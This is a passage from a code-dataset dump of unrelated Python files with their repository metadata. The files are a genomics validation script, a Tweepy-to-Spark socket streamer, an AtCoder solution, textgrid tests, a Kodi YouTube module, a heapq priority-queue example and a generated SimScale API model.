self.hook_after_run(self)
self.after_run(**kwargs)
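# --- Minimal usage sketch (hypothetical subclass, added for illustration) ---
class _EchoExperiment(BaseExperiment):
    """trivial subclass showing the template-method flow of exec()"""
    def apply_configs(self):
        print("configs:", self.exp_configs)
    def before_run(self, **kwargs):
        print("setting up")
    def run(self, **kwargs):
        print("running")
    def after_run(self, **kwargs):
        print("cleaning up")
if __name__ == "__main__":
    _EchoExperiment({"seed": 0}, hook_before_run=lambda exp: print("hook")).exec()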
|
[
"632291793@qq.com"
] |
632291793@qq.com
|
cfe480d022ad715c760a2b50cc3d97fa9baf03a5
|
5374bd9a9fc8cc07f6966c490a137003ddc64d9b
|
/VEnCode/scripts/validation.py
|
14fa681c8adc40990d15197e91301865df279be4
|
[
"BSD-3-Clause"
] |
permissive
|
AndreMacedo88/VEnCode
|
31f9f545019f62e0af716395a11961515c229394
|
667c777c6ef12c43e993660e5c695d4d6d43385e
|
refs/heads/master
| 2021-01-06T03:55:44.385885
| 2020-11-24T18:05:38
| 2020-11-24T18:05:38
| 90,248,803
| 0
| 1
|
NOASSERTION
| 2020-02-04T22:29:39
| 2017-05-04T10:02:48
|
Python
|
UTF-8
|
Python
| false
| false
| 4,091
|
py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
""" validation.py: file used to cross-validate VEnCodes found using the FANTOM5 data set. """
import os
import sys
import VEnCode.outside_data
file_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(file_dir)
from VEnCode import internals
import VEnCode.internals_extensions as iext
cell_types = {"hips_assay": "hIPS", "hepG2_assay": "hepatocellular carcinoma cell line: HepG2 ENCODE",
"sclc_chr_accessibility_assay": "small cell lung carcinoma cell line",
"sclc_assay": "small cell lung carcinoma cell line", "h82_assay": "small cell lung carcinoma cell line",
"b_lymph_assay": "B lymphoblastoid cell line- GM12878 ENCODE",
"du145_assay": "prostate cancer cell line:DU145",
"pc_3_assay": "prostate cancer cell line:PC-3"}
# Barakat TS, 2018 assays:
# hips_assay = iext.Assay("BarakatTS2018", "sampling", celltype="hIPS", data="core", parsed=False)
validate_with = internals.BarakatTS2018Data(data="core")
hips_assay_val = iext.Assay("BarakatTS2018", "sampling", celltype="hIPS", data="core", parsed=False,
validate_with=validate_with)
hips_assay_val.to_csv()
# Inoue F, 2017 assays:
hepG2_assay = iext.Assay("InoueF2017", "sampling", celltype="hepatocellular carcinoma cell line: HepG2 ENCODE")
hepG2_assay.to_csv()
validate_with = internals.InoueF2017Data()
hepG2_assay_val = iext.Assay("InoueF2017", "sampling", celltype="hepatocellular carcinoma cell line: HepG2 ENCODE",
validate_with=validate_with)
hepG2_assay_val.to_csv()
# Denny SK, 2016 assays:
sclc_chr_accessibility_assay = iext.Assay("DennySK2016", "sampling",
celltype="small cell lung carcinoma cell line")
# Wang X, 2018 assays:
b_lymph_assay = iext.Assay("WangX2018", "sampling", celltype="B lymphoblastoid cell line: GM12878 ENCODE")
b_lymph_assay.to_csv()
validate_with = internals.Bed("WangX2018")
b_lymph_assay_val = iext.Assay("WangX2018", "sampling", celltype="B lymphoblastoid cell line: GM12878 ENCODE",
validate_with=validate_with)
b_lymph_assay_val.to_csv()
# Christensen CL, 2014 assays:
h82_assay = iext.Assay("ChristensenCL2014", "sampling", celltype="small cell lung carcinoma cell line:NCI-H82",
data="H82", parsed=False)
h82_assay.to_csv()
validate_with = internals.ChristensenCL2014Data(data="H82")
h82_assay_val = iext.Assay("ChristensenCL2014", "sampling", celltype="small cell lung carcinoma cell line:NCI-H82",
data="H82", parsed=False, validate_with=validate_with)
h82_assay_val.to_csv()
h82_controls = iext.NegativeControl("ChristensenCL2014", "sampling", data="H82")
h82_controls.to_csv()
# Liu Y, 2017 assays:
du145_assay = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:DU145", parsed=False)
du145_assay.to_csv()
pc_3_assay = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:PC-3", parsed=False)
pc_3_assay.to_csv()
prostate_cancer_assay = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line", parsed=True)
prostate_cancer_assay.to_csv()
validate_with = internals.BroadPeak("LiuY2017")
du145_assay_val = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:DU145", parsed=False,
validate_with=validate_with)
du145_assay_val.to_csv()
validate_with = internals.BroadPeak("LiuY2017")
pc_3_assay_val = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:PC-3", parsed=False,
validate_with=validate_with)
pc_3_assay_val.to_csv()
validate_with = VEnCode.outside_data.BroadPeak("LiuY2017")
prostate_cancer_assay_val = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line", parsed=True,
validate_with=validate_with)
prostate_cancer_assay_val.to_csv()
lncap_controls = iext.NegativeControl("LiuY2017", "sampling")
lncap_controls.to_csv()
|
[
"andre.lopes.macedo@gmail.com"
] |
andre.lopes.macedo@gmail.com
|
049f94be6d12bfee0f18ebcd3db8d97694c6293e
|
22d8565bf563adcbc38f666dec3b57a1c3fd11f4
|
/build/husky/husky_base/catkin_generated/pkg.installspace.context.pc.py
|
84e0ed79d5a30c4ff0815b97e19969e016fab682
|
[] |
no_license
|
JJHbrams/DynamoP2.0
|
4c4160fcb81b7d6a4f2f0ce10e863fd8aa190a82
|
a0d554b0620ac90ea3388ec3c2f5225baa6237c3
|
refs/heads/master
| 2021-01-03T19:55:42.136766
| 2020-11-11T04:42:43
| 2020-11-11T04:42:43
| 240,215,298
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 718
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include;/usr/include".split(';') if "${prefix}/include;/usr/include" != "" else []
PROJECT_CATKIN_DEPENDS = "diagnostic_updater;hardware_interface;husky_msgs;roscpp;sensor_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lhorizon_legacy;/usr/lib/x86_64-linux-gnu/libboost_chrono.so;/usr/lib/x86_64-linux-gnu/libboost_system.so".split(';') if "-lhorizon_legacy;/usr/lib/x86_64-linux-gnu/libboost_chrono.so;/usr/lib/x86_64-linux-gnu/libboost_system.so" != "" else []
PROJECT_NAME = "husky_base"
PROJECT_SPACE_DIR = "/home/mrjohd/Kinodynamic_ws/install"
PROJECT_VERSION = "0.4.2"
|
[
"dpswpfrhdid@naver.com"
] |
dpswpfrhdid@naver.com
|
ed05634f40ffd828dade32145311476d092888ca
|
951bd2ae0de80ebb03cdb5214d06c71b617dbdf6
|
/Spark Streaming/TweetRead.py
|
744587f609d2ff6dfff0cce8154dc29f2d82a2bd
|
[] |
no_license
|
albertopformoso/Spark-and-Python-for-Big-Data-with-PySpark
|
c259fdc1d18e43dd4dbdbfa60c8eaff3080a2781
|
8789a0f0b218a46bd9accca27ca8faaea2ed7cdc
|
refs/heads/master
| 2023-02-23T02:12:38.730739
| 2021-01-24T19:26:29
| 2021-01-24T19:26:29
| 330,278,792
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,681
|
py
|
from dotenv import load_dotenv, find_dotenv
import tweepy
from tweepy import OAuthHandler
from tweepy import Stream
from tweepy.streaming import StreamListener
import socket
import json
import os
if len(find_dotenv()) == 0:
raise RuntimeError("Can't find your .env file")
# Set up your credentials
consumer_key = os.getenv('API_KEY')
consumer_secret= os.getenv('API_SECRET_KEY')
access_token = os.getenv('ACCESS_TOKEN')
access_secret = os.getenv('ACCESS_TOKEN_SECRET')
class TweetsListener(StreamListener):
def __init__(self, csocket):
self.client_socket = csocket
def on_data(self, data):
try:
msg = json.loads( data )
print( msg['text'].encode('utf-8') )
self.client_socket.send( msg['text'].encode('utf-8') )
return True
except BaseException as e:
print("Error on_data: %s" % str(e))
return True
def on_error(self, status):
print(status)
return True
def sendData(c_socket):
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_secret)
twitter_stream = Stream(auth, TweetsListener(c_socket))
twitter_stream.filter(track=['guitar'])
if __name__ == "__main__":
s = socket.socket() # Create a socket object
host = "127.0.0.1" # Get local machine name
port = 5555 # Reserve a port for your service.
s.bind((host, port)) # Bind to the port
print("Listening on port: %s" % str(port))
s.listen(5) # Now wait for client connection.
c, addr = s.accept() # Establish connection with client.
print( "Received request from: " + str( addr ) )
sendData( c )
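# --- Consumer-side sketch (assumed counterpart; not part of this script) ---
# A Spark Streaming job can read this socket feed, e.g.:
#     from pyspark.streaming import StreamingContext
#     ssc = StreamingContext(sc, 10)  # sc: an existing SparkContext
#     lines = ssc.socketTextStream("127.0.0.1", 5555)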
|
[
"albertopformoso@gmail.com"
] |
albertopformoso@gmail.com
|
f6e7f7cf4f1a49aa64ffb503f49ad5eeb1ce2097
|
c6b15c628a185d9f71c91543aac3a90495152c09
|
/Python Unit-Testing Course/.idea/VirtualEnvironment/Scripts/easy_install-3.7-script.py
|
42bf3bd2e8c73d16b39b6f563df885427bd62bc2
|
[] |
no_license
|
reichlj/PythonBsp
|
3e47d3b22b75cf1f67d3e47b83b125a1ddbc518d
|
51c25370495d3a8847f46a9de1bc8e0d811ae5a7
|
refs/heads/master
| 2021-06-12T22:32:15.365906
| 2021-05-08T20:44:01
| 2021-05-08T20:44:01
| 173,499,716
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
#!"C:\dev\PythonBsp\Python Unit-Testing Course\.idea\VirtualEnvironment\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.7')()
)
|
[
"jakobreichl@gmail.com"
] |
jakobreichl@gmail.com
|
37e98194ea73e6a1e99634dbf212cd5d261da891
|
3fbfabfaaada7b9b77e8a1df8fed4de444070d49
|
/session_10/create_db.py
|
c1c70ca97f2955670dfb74a0e794333f80293c9c
|
[
"MIT"
] |
permissive
|
dravate/spark_python_course
|
df36a561ab2cf8f763dd02655319cd6bf5b7876c
|
519389fdb21d78cd6d19e1ad2f7c782bc1449a83
|
refs/heads/main
| 2023-07-08T06:53:27.635106
| 2021-08-03T14:44:55
| 2021-08-03T14:44:55
| 385,127,461
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 260
|
py
|
import os
import sqlite3
db_filename = 'todo.db'
new_db = not os.path.exists(db_filename)
conn = sqlite3.connect(db_filename)
if new_db:
print ("Please create Schema")
else:
print ("DB is already created - mostly the schema exists")
conn.close()
|
[
"sopan.shewale@gmail.com"
] |
sopan.shewale@gmail.com
|
170b7b398ab61f3b24b1986299996fa4ce73ce29
|
d24a6e0be809ae3af8bc8daa6dacfc1789d38a84
|
/other_contests/PAST2019/H.py
|
5b5e04e27939ddcd508e3e8a2e1ea67db3e4dc3d
|
[] |
no_license
|
k-harada/AtCoder
|
5d8004ce41c5fc6ad6ef90480ef847eaddeea179
|
02b0a6c92a05c6858b87cb22623ce877c1039f8f
|
refs/heads/master
| 2023-08-21T18:55:53.644331
| 2023-08-05T14:21:25
| 2023-08-05T14:21:25
| 184,904,794
| 9
| 0
| null | 2023-05-22T16:29:18
| 2019-05-04T14:24:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,782
|
py
|
def solve(n, c_list, q, s_list):
    # Lazy range updates: one offset for "decrement everything" (global_dec),
    # one for the odd positions only (odd_dec; 0-based even indices), plus
    # per-item offsets; running minima make every query O(1).
    res = 0
dec_list_n = [0] * n
global_dec = 0
odd_dec = 0
global_min = min(c_list)
odd_min = min(c_list[0::2])
for i in range(q):
s = s_list[i]
if s[0] == "1":
_, x, a = map(int, s.split())
x -= 1
if x % 2 == 0:
x_res = c_list[x] - global_dec - odd_dec - dec_list_n[x]
if x_res >= a:
dec_list_n[x] += a
res += a
odd_min = min(odd_min, x_res - a)
global_min = min(global_min, x_res - a)
else:
x_res = c_list[x] - global_dec - dec_list_n[x]
if x_res >= a:
dec_list_n[x] += a
res += a
global_min = min(global_min, x_res - a)
elif s[0] == "2":
_, a = map(int, s.split())
if odd_min >= a:
odd_dec += a
odd_min -= a
res += a * ((n + 1) // 2)
global_min = min(global_min, odd_min)
else:
_, a = map(int, s.split())
if global_min >= a:
global_dec += a
global_min -= a
odd_min -= a
res += a * n
return res
def main():
n = int(input())
c_list = list(map(int, input().split()))
q = int(input())
s_list = [""] * q
for i in range(q):
s = input()
s_list[i] = s
res = solve(n, c_list, q, s_list)
print(res)
def test():
assert solve(4, [5, 3, 3, 5], 6, ["1 2 1", "2 2", "2 2", "3 100", "3 1", "1 1 3"]) == 9
assert solve(2, [3, 4], 3, ["1 2 9", "2 4", "3 4"]) == 0
if __name__ == "__main__":
test()
main()
|
[
"cashfeg@gmail.com"
] |
cashfeg@gmail.com
|
2ebb4a3c821548b4cd7fbbd2eed1c70047122136
|
e26cfc715513ae3b4393ea918e78ed5f27664dff
|
/src/textgrid_tools_tests/intervals/common_py/test_merge_intervals.py
|
f9d043c5f90ec45d259c06d011eee8b6db3d3313
|
[
"MIT"
] |
permissive
|
stefantaubert/textgrid-ipa
|
f4cd52b2c9d53570587b030dec758176229ee5e0
|
ada294513315d76db7e91cbbfb7c386a75f84966
|
refs/heads/main
| 2023-06-09T01:30:18.159171
| 2023-05-30T15:23:18
| 2023-05-30T15:23:18
| 301,960,070
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 965
|
py
|
from textgrid.textgrid import Interval
from textgrid_tools.intervals.common import merge_intervals
def test_component_include_empty():
intervals = (
Interval(0, 1, ""),
Interval(1, 2, "b"),
Interval(2, 3, " "),
Interval(3, 4, "c"),
Interval(4, 5, "d"),
)
result = merge_intervals(list(intervals), "X", False)
assert_interval = Interval(0, 5, "XbX XcXd")
assert result.minTime == assert_interval.minTime
assert result.maxTime == assert_interval.maxTime
assert result.mark == assert_interval.mark
def test_component_ignore_empty():
intervals = (
Interval(0, 1, ""),
Interval(1, 2, "b"),
Interval(2, 3, " "),
Interval(3, 4, "c"),
Interval(4, 5, "d"),
)
result = merge_intervals(list(intervals), "X", True)
assert_interval = Interval(0, 5, "bX XcXd")
assert result.minTime == assert_interval.minTime
assert result.maxTime == assert_interval.maxTime
assert result.mark == assert_interval.mark
|
[
"stefan.taubert@posteo.de"
] |
stefan.taubert@posteo.de
|
11f859a7d2ceaac0b717f0b785430b13ea39ee51
|
cff2b7c96ca0355a44116f6d18f026da69e412b0
|
/script.module.Galaxy/lib/resources/lib/modules/youtube.py
|
aad8ebbdf56a5370160d29b30a05da9d5af36820
|
[
"Beerware"
] |
permissive
|
krazware/therealufo
|
cc836e4e7049d277205bb590d75d172f5745cb7d
|
4d6341c77e8c2cc9faec0f748a9a2d931b368217
|
refs/heads/master
| 2020-03-19T00:41:22.109154
| 2019-11-12T05:06:14
| 2019-11-12T05:06:14
| 135,496,631
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,193
|
py
|
# -*- coding: UTF-8 -*-
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @tantrumdev wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
# Addon Name: Galaxy
# Addon id: plugin.video.Galaxy
# Addon Provider: The Martian
import re,json
from resources.lib.modules import client
from resources.lib.modules import workers
class youtube(object):
def __init__(self, key=''):
self.list = [] ; self.data = []
self.base_link = 'http://www.youtube.com'
self.key_link = '&key=%s' % key
self.playlists_link = 'https://www.googleapis.com/youtube/v3/playlists?part=snippet&maxResults=50&channelId=%s'
self.playlist_link = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&maxResults=50&playlistId=%s'
self.videos_link = 'https://www.googleapis.com/youtube/v3/search?part=snippet&order=date&maxResults=50&channelId=%s'
self.content_link = 'https://www.googleapis.com/youtube/v3/videos?part=contentDetails&id=%s'
self.play_link = 'plugin://plugin.video.youtube/play/?video_id=%s'
def playlists(self, url):
url = self.playlists_link % url + self.key_link
return self.play_list(url)
def playlist(self, url, pagination=False):
cid = url.split('&')[0]
url = self.playlist_link % url + self.key_link
return self.video_list(cid, url, pagination)
def videos(self, url, pagination=False):
cid = url.split('&')[0]
url = self.videos_link % url + self.key_link
return self.video_list(cid, url, pagination)
def play_list(self, url):
try:
result = client.request(url)
result = json.loads(result)
items = result['items']
except:
pass
for i in range(1, 5):
try:
if not 'nextPageToken' in result: raise Exception()
next = url + '&pageToken=' + result['nextPageToken']
result = client.request(next)
result = json.loads(result)
items += result['items']
except:
pass
for item in items:
try:
title = item['snippet']['title']
title = title.encode('utf-8')
url = item['id']
url = url.encode('utf-8')
image = item['snippet']['thumbnails']['high']['url']
if '/default.jpg' in image: raise Exception()
image = image.encode('utf-8')
self.list.append({'title': title, 'url': url, 'image': image})
except:
pass
return self.list
def video_list(self, cid, url, pagination):
try:
result = client.request(url)
result = json.loads(result)
items = result['items']
except:
pass
for i in range(1, 5):
try:
if pagination == True: raise Exception()
if not 'nextPageToken' in result: raise Exception()
page = url + '&pageToken=' + result['nextPageToken']
result = client.request(page)
result = json.loads(result)
items += result['items']
except:
pass
try:
if pagination == False: raise Exception()
next = cid + '&pageToken=' + result['nextPageToken']
except:
next = ''
for item in items:
try:
title = item['snippet']['title']
title = title.encode('utf-8')
try: url = item['snippet']['resourceId']['videoId']
except: url = item['id']['videoId']
url = url.encode('utf-8')
image = item['snippet']['thumbnails']['high']['url']
if '/default.jpg' in image: raise Exception()
image = image.encode('utf-8')
append = {'title': title, 'url': url, 'image': image}
if not next == '': append['next'] = next
self.list.append(append)
except:
pass
try:
u = [range(0, len(self.list))[i:i+50] for i in range(len(range(0, len(self.list))))[::50]]
u = [','.join([self.list[x]['url'] for x in i]) for i in u]
u = [self.content_link % i + self.key_link for i in u]
threads = []
for i in range(0, len(u)):
threads.append(workers.Thread(self.thread, u[i], i))
self.data.append('')
[i.start() for i in threads]
[i.join() for i in threads]
items = []
for i in self.data: items += json.loads(i)['items']
except:
pass
for item in range(0, len(self.list)):
try:
vid = self.list[item]['url']
self.list[item]['url'] = self.play_link % vid
d = [(i['id'], i['contentDetails']) for i in items]
d = [i for i in d if i[0] == vid]
d = d[0][1]['duration']
duration = 0
try: duration += 60 * 60 * int(re.findall('(\d*)H', d)[0])
except: pass
try: duration += 60 * int(re.findall('(\d*)M', d)[0])
except: pass
try: duration += int(re.findall('(\d*)S', d)[0])
except: pass
duration = str(duration)
self.list[item]['duration'] = duration
except:
pass
return self.list
def thread(self, url, i):
try:
result = client.request(url)
self.data[i] = result
except:
return
|
[
"krazinabox@gmail.com"
] |
krazinabox@gmail.com
|
67cfe06d88e3de17422ae039a63a853c1b86bb5e
|
064190a2de1ad156e1060f0efdee7e754a96b4bb
|
/Unit1/1.5.py
|
07c1c3c95a554ba8ca6b0432b654b42f2fe5c8eb
|
[] |
no_license
|
zqy1/pythonCookbook
|
7254fadf3fac277b107941bc32e4716de3f7c329
|
89a05a2a4d723fb49548e0e87d2542bd5d07fbee
|
refs/heads/master
| 2020-08-03T17:27:09.351396
| 2015-09-18T13:05:14
| 2015-09-18T13:05:14
| 73,540,483
| 1
| 0
| null | 2016-11-12T08:14:50
| 2016-11-12T08:14:50
| null |
UTF-8
|
Python
| false
| false
| 1,758
|
py
|
#!/usr/bin/env python
# encoding: utf-8
"""
1.5 实现优先级队列
我们想实现一个队列,它会按给定的优先级来对元素排序,
且每次 pop 操作时都返回优先级最高的那个元素
heapq 模块函数:
heappush(heap, item) # 将item压入堆中
heappop(heap) # 将堆中最小的元素弹出
heappushpop(heap, item) # 先将item压入heap中再弹出heap的堆顶元素
# 这比两次用heappush 和 heappop函数快的多
heapreplace(heap,item) # 先pop再把item压入heap中
heapify(x) # 对列表x进行堆排序,默认是小顶堆
merge(*iterables) # 将多个列表进行合并,然后进行堆调整,返回的是列表的可迭代对象。
nlargest # 1.4中用过,返回最大的n个元素
nsmallest # 1.4中用过,返回最小的n个元素
"""
# A simple priority queue class built on the heapq module
import heapq
class PriorityQueue:
"""优先级队列类"""
def __init__(self):
"""初始化,属性"""
self._queue = []
self._index = 0
def push(self, item, priority):
"""依据负优先级将索引和项压入堆中"""
heapq.heappush(self._queue, (-priority, self._index, item))
self._index += 1
def pop(self):
return heapq.heappop(self._queue)[-1]
class Item():
"""插入元素"""
def __init__(self, name):
self.name = name
def __repr__(self):
return 'Item({!r})'.format(self.name)
# main
q = PriorityQueue()
q.push(Item('neo'), 1)
q.push(Item('jack'), 2)
q.push(Item('sister'), 4)
q.push(Item('me'), 4)
print q.pop()
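# The _index counter breaks ties between equal priorities, so items with the
# same priority pop in insertion order (sketch of the remaining pops):
print q.pop()  # Item('me')
print q.pop()  # Item('jack')
print q.pop()  # Item('neo')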
|
[
"neo1218@yeah.net"
] |
neo1218@yeah.net
|
292162c5cafc53d1a12dc03d491b24cf96e78e25
|
1254f553b70353c6d4ee85c2497db23ebb7903f2
|
/test/test_component_history_dto.py
|
4355b4f43a4156efe6b2297894e9425535b89a0a
|
[
"Apache-2.0"
] |
permissive
|
tspannhw/nifi-python-swagger-client
|
05137bd2ad36706f323621ab2510abb124ce9bf9
|
0cc73d31a1143c3fa73237fd3d4702a7c3c5b3b1
|
refs/heads/master
| 2021-01-20T02:24:36.484855
| 2017-08-24T12:52:46
| 2017-08-24T12:52:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,377
|
py
|
# coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.2.0
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.models.component_history_dto import ComponentHistoryDTO
class TestComponentHistoryDTO(unittest.TestCase):
""" ComponentHistoryDTO unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testComponentHistoryDTO(self):
"""
Test ComponentHistoryDTO
"""
# FIXME: construct object with mandatory attributes with example values
#model = swagger_client.models.component_history_dto.ComponentHistoryDTO()
pass
if __name__ == '__main__':
unittest.main()
|
[
"dchaffey@hortonworks.com"
] |
dchaffey@hortonworks.com
|
6da0bcecf30603f283acccf783ffabe67f975332
|
e3402d37d5a9fb7ee3c3c73e95732d778f48b6fb
|
/com/kute/algorithms/__init__.py
|
fda4ab1360693493004b434ada15fd4d10c6bff4
|
[] |
no_license
|
kute/purepythontest
|
51d3186ddaa2f1142382768380b776a1ba9469ed
|
2baa1746a34cefe0be0e5f59be21450d330491a7
|
refs/heads/master
| 2020-04-12T06:20:14.957566
| 2018-03-18T07:03:22
| 2018-03-18T07:03:22
| 65,204,109
| 4
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 163
|
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# __author__ = 'kute'
# __mtime__ = '16/5/24 21:40'
def main():
pass
if __name__ == '__main__':
main()
|
[
"kutekute00@gmail.com"
] |
kutekute00@gmail.com
|
484fb1aa20f41b92a393cd858ddb44178f0c42cf
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2482/60708/267104.py
|
aad8d1301873e9edbe9c748d5974ac162ce03841
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 610
|
py
|
N=int(input())
for n in range(0,N):
x=int(input())
y=int(input())
result=list(str(x/y))
a=""#小数点前
b="."
for i in range(0,len(result)):
if(result[0])=='.':
a=a+result[0]
result.pop(0)
b=''.join(result)[0:]
break
else:
a=a+result[0]
result.pop(0)
if len(b)<16:
print(a,end='')
print(b,end='')
else:
for i in range(1,16+1):
if b[0:i]==b[i:i+i]:
b='('+b[0:i]+')'
break
print(a,end='')
print(b,end='')
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
742e6ea7de50bcac003bc3d80347733854493805
|
bc54edd6c2aec23ccfe36011bae16eacc1598467
|
/simscale_sdk/models/one_of_velocity_inlet_bc_net_radiative_heat_flux.py
|
b26f7a002aaa6f9893e3aa80e77d6c8f7b0d3f5c
|
[
"MIT"
] |
permissive
|
SimScaleGmbH/simscale-python-sdk
|
4d9538d5efcadae718f12504fb2c7051bbe4b712
|
6fe410d676bf53df13c461cb0b3504278490a9bb
|
refs/heads/master
| 2023-08-17T03:30:50.891887
| 2023-08-14T08:09:36
| 2023-08-14T08:09:36
| 331,949,105
| 17
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,040
|
py
|
# coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from simscale_sdk.configuration import Configuration
class OneOfVelocityInletBCNetRadiativeHeatFlux(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type': 'str',
'emissivity': 'DimensionalDimensionless',
'radiative_source_value': 'DimensionalHeatFlux'
}
attribute_map = {
'type': 'type',
'emissivity': 'emissivity',
'radiative_source_value': 'radiativeSourceValue'
}
discriminator_value_class_map = {
'GREYBODY_DIFFUSIVE': 'GreybodyDiffusiveRSBC',
'OPEN_WINDOW': 'OpenWindowRSBC'
}
def __init__(self, type='OPEN_WINDOW', emissivity=None, radiative_source_value=None, local_vars_configuration=None): # noqa: E501
"""OneOfVelocityInletBCNetRadiativeHeatFlux - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._type = None
self._emissivity = None
self._radiative_source_value = None
self.discriminator = 'type'
self.type = type
if emissivity is not None:
self.emissivity = emissivity
if radiative_source_value is not None:
self.radiative_source_value = radiative_source_value
@property
def type(self):
"""Gets the type of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
Schema name: OpenWindowRSBC # noqa: E501
:return: The type of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this OneOfVelocityInletBCNetRadiativeHeatFlux.
Schema name: OpenWindowRSBC # noqa: E501
:param type: The type of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
self._type = type
@property
def emissivity(self):
"""Gets the emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:return: The emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:rtype: DimensionalDimensionless
"""
return self._emissivity
@emissivity.setter
def emissivity(self, emissivity):
"""Sets the emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux.
:param emissivity: The emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:type: DimensionalDimensionless
"""
self._emissivity = emissivity
@property
def radiative_source_value(self):
"""Gets the radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:return: The radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:rtype: DimensionalHeatFlux
"""
return self._radiative_source_value
@radiative_source_value.setter
def radiative_source_value(self, radiative_source_value):
"""Sets the radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux.
:param radiative_source_value: The radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:type: DimensionalHeatFlux
"""
self._radiative_source_value = radiative_source_value
def get_real_child_model(self, data):
"""Returns the real base class specified by the discriminator"""
discriminator_key = self.attribute_map[self.discriminator]
discriminator_value = data[discriminator_key]
return self.discriminator_value_class_map.get(discriminator_value)
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, OneOfVelocityInletBCNetRadiativeHeatFlux):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, OneOfVelocityInletBCNetRadiativeHeatFlux):
return True
return self.to_dict() != other.to_dict()
|
[
"simscale"
] |
simscale
|
adacebb3ba78137de88beae5fab192ad6c360797
|
